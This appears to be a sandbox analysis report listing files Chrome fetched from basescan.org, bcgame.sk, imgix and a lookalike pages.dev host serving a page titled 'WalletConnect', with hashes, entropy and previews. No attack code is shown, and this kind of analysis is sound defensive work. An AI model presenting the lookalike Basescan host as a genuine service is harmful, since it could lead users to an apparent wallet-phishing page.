                                                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, baseline, precision 8, 20x20, components 3
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):496
                                                                                                                                                                                                                                              Entropy (8bit):6.011057667291563
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6:dv9AaVHvGjfT11Tqap/+jJJeiryO9dDtmBlCMyyrejtvnlhMGxySYoUZ1ZlT7RyA:16atejr1tBI392Ijn0SYoUZjytdea8n
                                                                                                                                                                                                                                              MD5:D86C461BD6EFB2E45FBA28E75A77068B
                                                                                                                                                                                                                                              SHA1:94D2FFFDC5718ABB6F01A1AC2E9AADE35EC541E0
                                                                                                                                                                                                                                              SHA-256:CBB2B8EF2489E055EC65EFD6B5BFD6DF043CC97FF71DFFE702D3BF86DAC3EEBC
                                                                                                                                                                                                                                              SHA-512:B89D736936FBCEA6E4B51639D8F833432708F9D50107C33D54BB890BBC05E09964A04F02F042866BED0F4E3B4A73DE53452B0AC97C9E3C87DEA7BBFD41252850
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan.org/images/gen/stake-4_20.png
                                                                                                                                                                                                                                              Preview:......JFIF.............C....................................................................C............................................................................".....................................'.............................1..!"#Ab...................................................Q............?....._...ic..x.1...n|;........}..W....q...2Q#.....-..5j.d.k..."....bJJ..Nm......C-xS..v.Y..WO_....w.XR..1.o..C.....0O...n.|....4.s.*k.A....m.q`...]*QZ..(p.2.7...6\..B.JS0.)@...
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:Java source, ASCII text, with very long lines (634)
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):635
                                                                                                                                                                                                                                              Entropy (8bit):5.233963609220039
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:12:kDXvpCH5ZAA9f8bCvyKavKp9PKCSqjMAIKpj34xjD:kBCIA90C9bScd5j3eD
                                                                                                                                                                                                                                              MD5:0D4D6CCC7CD7E3F2392141F967BC3FA4
                                                                                                                                                                                                                                              SHA1:5DF2ABC7460E727EB2C26C43CE249440FFCF0652
                                                                                                                                                                                                                                              SHA-256:B28A003AC373A6C04F162084BE1432238FEFEAE682B41D2002079CEBF3B91D26
                                                                                                                                                                                                                                              SHA-512:8334AA4E2B08272C8E109C2CD3208F811CEB972DA3D935ED9EE8DAC45B16299C2BE4A58AF976BA539C55A2C13A84DCE0DB4EA7B656B1900E6CD0120B21BC6F99
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/modules/lottery2/assets/toNumber-e58af95e.js
                                                                                                                                                                                                                                              Preview:import{a as n,b as f,i as e}from"./isObject-909534d5.js";var o="[object Symbol]";function a(r){return typeof r=="symbol"||n(r)&&f(r)==o}var c=/\s/;function b(r){for(var t=r.length;t--&&c.test(r.charAt(t)););return t}var m=/^\s+/;function y(r){return r&&r.slice(0,b(r)+1).replace(m,"")}var s=0/0,p=/^[-+]0x[0-9a-f]+$/i,I=/^0b[01]+$/i,d=/^0o[0-7]+$/i,x=parseInt;function T(r){if(typeof r=="number")return r;if(a(r))return s;if(e(r)){var t=typeof r.valueOf=="function"?r.valueOf():r;r=e(t)?t+"":t}if(typeof r!="string")return r===0?r:+r;r=y(r);var i=I.test(r);return i||d.test(r)?x(r.slice(2),i?2:8):p.test(r)?s:+r}export{a as i,T as t};.
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):1535
                                                                                                                                                                                                                                              Entropy (8bit):6.309337688329889
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:24:+ZYj6Ldikzum8COZNDsLlpGPUc6Ql/VSVynJY1l3kXPMabiOiA9e:+ZYjwdiklfll0xl/e70/t9e
                                                                                                                                                                                                                                              MD5:1AC808AAA86CB19C89520B895D0D7D95
                                                                                                                                                                                                                                              SHA1:81647C0DA795CCDA2D51CF0FD24A3596FB0537D5
                                                                                                                                                                                                                                              SHA-256:327BDC404B9B7FE3E59818B1DBC0A3A2F4DA7E50C77188AE90D40846E0BAD0E2
                                                                                                                                                                                                                                              SHA-512:570DF8148599F87D4FB89D0ECC11B75061BA54228557DA2D89C2636B8808D78F60F6556007F0D921F25A5C3C496290A0CAEADDA1F4BCE8D47FD67EE5ECE99911
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bc.imgix.net/game/image/d761cd69ed.jpg?_v=4&w=100&auto=format&cs=tinysrgb&blur=100
                                                                                                                                                                                                                                              Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm..........iloc....D............3.......(iinf..........infe........av01Color.....iprp...cipco....ispe.......d........pixi............av1C........colrprof....lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....IX..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0......colrnclx...........ipma....................mdat........0@CA.2.......1..+T.*\.y.G..u:5._...B.l......6Wa..SD6pZb..(..w..{nD...j.2.BZ..I..1...4.N...H......Q.\.!...LozS.",..(M..iS....:fFM.A...p..>.V/........S.....^57..Q...q..Y.
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (43197), with no line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):43197
                                                                                                                                                                                                                                              Entropy (8bit):5.141936604803506
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:768:tStSnjNFxYd7Z6/4h4gSjCI0hve9rgRyCv5fqsubK47ytcmmWDfe:tStSnDxYd7Z6/4/S/
                                                                                                                                                                                                                                              MD5:26DD4E76C8FB4B184E47A4D721139A34
                                                                                                                                                                                                                                              SHA1:F60295581002D750EC495BB4AD3588C5D54BF245
                                                                                                                                                                                                                                              SHA-256:ABF4C7F56C20BA3B4A0CF894B055B864EA871A03C808CEC3E8E6574A73FDFAF7
                                                                                                                                                                                                                                              SHA-512:7FBED9EB181E234BCCCB25F17182E382BCC3D03D8D737E48DF35B2098FA6847A1E96EE7D4AAE58D4B34509A84774203A02C77E20B4BBBAFDEA4E9E6DA690A024
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan.org/assets/vendor/malihu-custom-scrollbar-plugin/jquery.mCustomScrollbar.css?v=24.4.4.9
                                                                                                                                                                                                                                              Preview:.mCustomScrollbar{-ms-touch-action:pinch-zoom;touch-action:pinch-zoom}.mCustomScrollbar.mCS_no_scrollbar,.mCustomScrollbar.mCS_touch_action{-ms-touch-action:auto;touch-action:auto}.mCustomScrollBox{position:relative;overflow:hidden;height:100%;max-width:100%;outline:none;direction:ltr}.mCSB_container{overflow:hidden;width:auto;height:auto}.mCSB_inside>.mCSB_container{margin-right:30px}.mCSB_container.mCS_no_scrollbar_y.mCS_y_hidden{margin-right:0}.mCS-dir-rtl>.mCSB_inside>.mCSB_container{margin-right:0;margin-left:30px}.mCS-dir-rtl>.mCSB_inside>.mCSB_container.mCS_no_scrollbar_y.mCS_y_hidden{margin-left:0}.mCSB_scrollTools{position:absolute;width:16px;height:auto;left:auto;top:0;right:0;bottom:0}.mCSB_outside+.mCSB_scrollTools{right:-26px}.mCS-dir-rtl>.mCSB_inside>.mCSB_scrollTools,.mCS-dir-rtl>.mCSB_outside+.mCSB_scrollTools{right:auto;left:0}.mCS-dir-rtl>.mCSB_outside+.mCSB_scrollTools{left:-26px}.mCSB_scrollTools .mCSB_draggerContainer{position:absolute;top:0;left:0;bottom:0;right:0
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:PNG image data, 660 x 600, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):16862
                                                                                                                                                                                                                                              Entropy (8bit):7.962272230176296
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:384:g7kSnTRIurSyPM6SaI7vWeQC0/ZwMlqJnhKBae:QkCBrcmwM88
                                                                                                                                                                                                                                              MD5:F47B2DCEFAE5A10E3D62E3B65134ECF2
                                                                                                                                                                                                                                              SHA1:B78C2454AE3EC44B7DA5004D2DE32D4573F82DE5
                                                                                                                                                                                                                                              SHA-256:28AE8942BD13DEE6C989399D3EA6037BB3084FD74EB03443BDC8E3C2832B6269
                                                                                                                                                                                                                                              SHA-512:00EF8B2762B3C6EB6EBC268078CE0BD8C4B4D4A546BD78F794B28EAA168BDCA2466EDDAAA76FD494AFDBD026E7C070EC4D0AC1DBD08BE62702935F3BB4716F8B
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:.PNG........IHDR.......X......;......PLTE...!!"..... ..... .................#...,13...-12...+22,16,14.........-02-12-02...,22.........,22......,13...,23-03......,12...,02........................@HI,126>?......(-...(...05:.. .!#>FG179!$&:BD#')<CD9@B/56-24&+,)-/$)*.."...4;==EF5=>)/116;%),"&(2:;28<4:= #%+/18?@59:6=@HFG......~...",. *......z8=STV..4...qrsSCETCE....$,....6;g>A.......06.)0...39]@C.+2...@@A.......%-abdOQRq;?.38.)1.....``a.5:;. iln....$_."[^`.!)z.#y.#%..1......3tRNS... .@p`...0..... @...`.p.PP. ...Pp@..`...o..?.X...?.IDATx.........................................................................`.. .a......*d.6..I.......J.q@A..N1.7...................z.V.`.e...$.DY..2%......c...+..j4{..l.dc.!LK4...C...`.[.m.FP..s.....tC./.....'....7....".7.k.7..=.6....%].'..5G..tPN5.y.....?..ov..i0..x.6Mke..'..._...B.Sq~.:.nB....Ha.]8.v....j..y.&&'Vb{~..0..pN...o.#<...lv./.~.......~...%.5....J..FB.G.....Z\.B...i.*..]..m...fa)._....&=V*.@~....".M.<..Z....9......-..U4.D.:.
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:PNG image data, 200 x 267, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):30893
                                                                                                                                                                                                                                              Entropy (8bit):7.988595582527584
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:768:oODmYz1lw1xkws80CnNbVDaQWUC77bN5noHZy:uaYds80ANRp+7bNZo4
                                                                                                                                                                                                                                              MD5:E06131B7F392F24C575C79FBAF8AAF62
                                                                                                                                                                                                                                              SHA1:C4E5575C58D4A23036BB111F7D09AA212B5FCCB1
                                                                                                                                                                                                                                              SHA-256:3234128767DCBEB20157D538A0F89B6F4CF7D5AAF0387E2F9CA761330A220544
                                                                                                                                                                                                                                              SHA-512:258D39EC5E0D7C6B85F55BBB2E95256E06D77C7DF5A145EA98459B30F3C6DA7CF2807BDF61F2A582C2C46DBF908D5B28F8D7407671B5539927B561FA7F123CF0
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:.PNG........IHDR...............9.....sRGB.........PLTESSP^ZUie`...b_XJHDTTXONHQQLYVRx..M.}3N....c`^...)=s1E~|....!}z....ohf..............fu..........:^.#O..R.q{.......q........y..9X.^w.>e.....{.unl.F.Py.......k..dce......a..........bk....zswzA.|...Ml..?w....Eo...............ac....Pn.......L<7..U........~...yy.......Ng.!0d.......f.1g..........$x....AO..v^...\.......%...lK....`AbRCe0....{,........sp..N"..|.....q.........c_{.)..l7.C......E.]G9.k1.U....4.l9....M.D.?...|.{...qp.M..zI6............`..8...dT..4.*bbsjaK.\8..0...0.K.p....kP.@....7~....TL..h...g.....4.yR.yk........UUj.5..U8a ......\`.....G&..W.ljz........g.q.......i...L...t..s..N.........BCa..AS\..Y..8..%..wP.......^2.........G..V.9=;P..]J$dJJe.O.c.0.1..k....d..x....2^...&_...$E.";...CJZ.ROSy....g.............=v7...8.... .IDATx^...T.w.0|.=.l3.....|.xs.#kI.. ..Q....H(.......#.F.......@..>..f...P:.Z.(.....Z........>....=3..w.....^3.._./.....w.>..?..|.x.g..P..XO.+./.=....7(^...q...*6
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/styles.css
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):3210
                                                                                                                                                                                                                                              Entropy (8bit):7.739462025595509
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:96:rGcIEcsyJzY0C1maDqeFrC3+d0aZMFOJo2:rGpIyqSeQ3H4WOr
                                                                                                                                                                                                                                              MD5:524D4E74835A6E0928D10CBFEDB4A16D
                                                                                                                                                                                                                                              SHA1:217E654AC4F7F05B13D129B7BB6F6D9A028665C3
                                                                                                                                                                                                                                              SHA-256:F141237271130428828DE0A119D69D20F43A3F2A630E3943DAC98EEC9BD4BA91
                                                                                                                                                                                                                                              SHA-512:1F97D7CFADA99DAD3984967E9B35DFA0586F81CB3CE75119605A3C3E5FF71CC538CAD4C0E5521502C6F327B2AE11D4E0F62DA454F12F1E94DB4EC81D9770F0B2
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://d107ul3j3wrui0.cloudfront.net/up/asset/27f8ad31f8/4452c4b386.png?w=320&h=50
                                                                                                                                                                                                                                              Preview:....ftypavif....avifmif1miaf....meta.......!hdlr........pict.................pitm.........4iloc....D@.........................................8iinf..........infe........av01.....infe........av01.....iprp....ipco....colrnclx...........av1C........ispe.......@...2....pixi.........8auxC....urn:mpeg:mpegB:cicp:systems:auxiliary:alpha.....av1C........pixi............ipma..........................iref........auxl..........mdat.....!g...2........VF`.X.....!g..@CA.2......9....._...$f8.?P.B_V.K.l.......+........yp..XX{..p..g....t9.`...R3.......S..W......0....@...j.o.#J.;ja.<.*...L...>.c.\W....W..4...........ws.O....$OP....:v....bX"P.J..8..F.E...2....?1...}v....W.^.iw.w...B..|d.E."...x./......V.b.w.d:.`Vm.J$..J.$@...v_.?v1.......g.&..>.e.74..'Yg.,1...tY ]..G..0.....=|F....;....\...)...>C.&S......Vk...e.... H.."~..]mo.M...:I....W.......<.).}q.......=.R.~p...v...O.t3(.l..d.t6......?.LTg.[*..PS.uG7pp...#.)....~5..1F..I....sT)1d#..2pB.v.M.U.u9.a..Y......x.Q....f2....5...
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):6365
                                                                                                                                                                                                                                              Entropy (8bit):7.8965403628961175
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:rGMz4DCvCtM/2svHiAaMRaH3511oqSGiI:rGKKjiHmtzSGiI
                                                                                                                                                                                                                                              MD5:8C09B42D62B8FA6AF9F655D2A64F75F3
                                                                                                                                                                                                                                              SHA1:8E2AFD18605214D673CC52BC21A4ECED0137C8AB
                                                                                                                                                                                                                                              SHA-256:D5040A78B49ED1C8E2E854495CD0BC86DC39C130ECFA18561E09F90C7D121CD0
                                                                                                                                                                                                                                              SHA-512:40B9DA7828AC58AA4E3DDD67989150C4E94BEF2563A6D4C7E8BB839F7F8FC49609611C6D8281275B8250B157C800939F1B39C51BFCEDD9A41321928F104A6F17
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://d107ul3j3wrui0.cloudfront.net/up/asset/9abd3edefa/78e9993f77.png?w=728&h=90
                                                                                                                                                                                                                                              Preview:....ftypavif....avifmif1miaf....meta.......!hdlr........pict.................pitm.........4iloc....D@................... .....................8iinf..........infe........av01.....infe........av01.....iprp....ipco....colrnclx...........av1C........ispe...........Z....pixi.........8auxC....urn:mpeg:mpegB:cicp:systems:auxiliary:alpha.....av1C........pixi............ipma..........................iref........auxl.........=mdat.....%.{,.2.....D..VF`.K.....e$.....%.{,...h@2........g..~{..[|...j...d.....[..m.'...aF..(e.Q...]Q.....5.p..V...$.....R+....b6.b.j3....Y.......tN.....8C..d.....a.W"...U.....,...e...-.23./.=<v.(.r...D.R..........U..[8.8.....'.3..SJ+..8.....U.-q"3........k..._., .}...S....-...`..z)%G.*.......[L)w....?..."..??..w8...G=2....a...#..ao.....h.X.l....C?SE.]..`.P..'j..*..........\....a5..PcZ..fr....?L1.......D.spB.2..R/q0......K.... 7_&.@.*V.{...a..Ly.[.I....I...a.3....b..$J...d...=.a.S.,~......6.U...v..E"..y}M..".....s.?......*..U....=
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):16511
                                                                                                                                                                                                                                              Entropy (8bit):7.881207836952498
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:384:HYNg7/iloh7uVrifSAC383C7MU96WTO6QBeJuyA/kb72Y:HYyGl+7uVfwQ9lXuyT2Y
                                                                                                                                                                                                                                              MD5:B63D00453A61244D395D697FBA71A359
                                                                                                                                                                                                                                              SHA1:D472A2EF727813FD75B64CD36C085829B0A7B639
                                                                                                                                                                                                                                              SHA-256:400ED8CA13333A8B9277FF8E1B5732DE51DAFFD810D583A20547C9297B39EBAC
                                                                                                                                                                                                                                              SHA-512:4F8CCC3558B408442CA7FE50D9302C3D4C21C63669E3C9996185254098A7B9C6D2C0FDEDBFBB06925A81C416798ED86A87E2AEA0CEAC888C159F21BBD93E218B
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bc.imgix.net/game/image/b5e0fa00d9.png?_v=4&auto=format&dpr=1&w=200
                                                                                                                                                                                                                                              Preview:... ftypavif....avifmif1miafMA1B...Gmeta.......(hdlr........pict............libavif.....pitm..........iloc....D............o..3....(iinf..........infe........av01Color.....iprp....ipco....ispe................pixi............av1C.......Tcolrprof...HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour spa
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):10462
                                                                                                                                                                                                                                              Entropy (8bit):7.744330502185992
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:+7UoYNMtKwXYP7OyrBZUWQWjpTK3M0say4bl8RRWgMIy:qYNg7XSO3xWFerXRSRWgMIy
                                                                                                                                                                                                                                              MD5:990BA2128E84F8CB9F80720E25B12C71
                                                                                                                                                                                                                                              SHA1:C31F29867C442A13C091979F05924330A2159EFB
                                                                                                                                                                                                                                              SHA-256:3ECA2938EF59E1E6F539A31CB212852346688CE22EFC3D353178307DCF739E9B
                                                                                                                                                                                                                                              SHA-512:30DB3652E432727065F762E90AB1EFC37FB9A205C3ABA05E6F4040549855C1A0BDEC52DA27091B32D8173E53929B64A37D254A33ED27216F40AA8416C51CA8C6
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bc.imgix.net/game/image/e992b8c2a1.png?_v=4&auto=format&dpr=1&w=200
                                                                                                                                                                                                                                              Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm.........,iloc....D............F.................<...Biinf..........infe........av01Color.....infe........av01Alpha.....iref........auxl..........iprp....ipco....ispe................pixi............av1C.......Tcolrprof...HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch............................
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (1494)
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):11579
                                                                                                                                                                                                                                              Entropy (8bit):5.3724312991432255
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:IRmMcbYW73qw8LlL+z4Js6L8xL/J+zp/lnuALsY:Sct3qw85qz4Js6L8J/JOp/lnuA4Y
                                                                                                                                                                                                                                              MD5:04A2BC2AD268156F46D8FF2DB4531EA3
                                                                                                                                                                                                                                              SHA1:0B4B9BD3BBB200665D286C7CCEFB3232EC7400E7
                                                                                                                                                                                                                                              SHA-256:D6A9B3343810FE01C82C687D7E45094BBF1234654EA605C2555544CA936BC6C0
                                                                                                                                                                                                                                              SHA-512:9A7FC31FEC5611DF50303CB7A5F41E22D30E64C7BB56329F97CDE917B90CA552CDC19198AB812801303578845DB16ECAF6DFE28E698B2B9EA73AC1C344E89692
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:var querystring=document.currentScript.src.substring(document.currentScript.src.indexOf("?"));var urlParams=new URLSearchParams(querystring);$.ajax({url:'/assets/js/custom/commonjs_token.js?'+urlParams,async:false,dataType:"script",cache:true,});var contentType="";var searchAddress=false;$(document).ready(function(){var showAd=[];var prepareAd=[];var intAdCount=availableAd.length;var d=new Date();if(intAdCount==4){if(d.getSeconds()>=45){showAd.push(availableAd[3]);}else if(d.getSeconds()>=30){showAd.push(availableAd[2]);}else if(d.getSeconds()>=15){showAd.push(availableAd[1]);}else{showAd.push(availableAd[0]);}}else if(intAdCount==3){if(d.getSeconds()>=40){showAd.push(availableAd[2]);}else if(d.getSeconds()>=20){showAd.push(availableAd[1]);}else{showAd.push(availableAd[0]);}}else if(intAdCount==2){if(d.getSeconds()>=30){showAd.push(availableAd[1]);}else{showAd.push(availableAd[0]);}}else if(intAdCount==1){showAd.push(availableAd[0]);}.if(showAd.length>0){prepareAd.push(gotAd[0]);}.if($
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/styles.css
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (2656)
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):2657
                                                                                                                                                                                                                                              Entropy (8bit):5.317173494483139
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:48:g1H/IiI2RB0Pf+eT4CI7OWZhivUKF6tLiNL+uzjjXAuyiGjf5PGYGCH2f0mAicB:WH/17VeCpKF6tLiNLxv+iMGYx+U
                                                                                                                                                                                                                                              MD5:DA38EAAB7566FD0581D84862534947CD
                                                                                                                                                                                                                                              SHA1:81C94309493F5EC6EC631E5BF66A67B63F35E17C
                                                                                                                                                                                                                                              SHA-256:F8EA4AC456BCA6A028B1C0226D7BBD2CFE30D54143D65F738B298503DEE88282
                                                                                                                                                                                                                                              SHA-512:73E6175F69DCFD4024919A17F99074E6E4973EA37A479DC6325968747351A2C150E50D933F396F18441A92618F756278D79A9949C861672DBE29F959834C5247
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://js.sentry-cdn.com/491bec80cba44bb6a4fd1e07bc276796.min.js
